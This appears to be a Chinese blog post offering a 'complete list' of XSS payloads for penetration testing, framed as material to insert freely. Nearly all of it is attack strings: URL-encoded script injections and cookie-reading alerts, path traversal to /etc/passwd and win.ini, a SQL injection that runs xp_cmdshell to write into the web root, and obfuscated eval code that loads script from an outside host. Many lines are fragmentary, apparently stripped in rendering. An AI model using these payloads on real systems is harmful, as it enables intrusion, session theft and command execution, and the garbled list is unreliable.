xss payload大全(实用)

验证xss的时候总感觉姿势不够

这下好了   这么多  任你随便插

'>
 ='>
 
 
 %3Cscript%3Ealert('XSS')%3C/script%3E
 
 
 %0a%0a.jsp
 %22%3cscript%3ealert(%22xss%22)%3c/script%3e
 %2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
 %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
 %3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
 %3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
 %3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
 %3f.jsp
 %3f.jsp
 
 
 ?sql_debug=1
 a%5c.aspx
 a.jsp/
 a/
 a?
 ">
 ';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&&
 %22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
 %3Cscript%3Ealert(document. domain);%3C/script%3E&
 %3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=
 
 
 
 
 
 
 
 
 
 
 "";' > out
 
 
 
 
 
 
 
 
getURL("javascript:alert('XSS')") a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d); "> <" PT src="http://xss.ha.ckers.org/a.js">

 

你可能感兴趣的:(渗透测试总结的方法)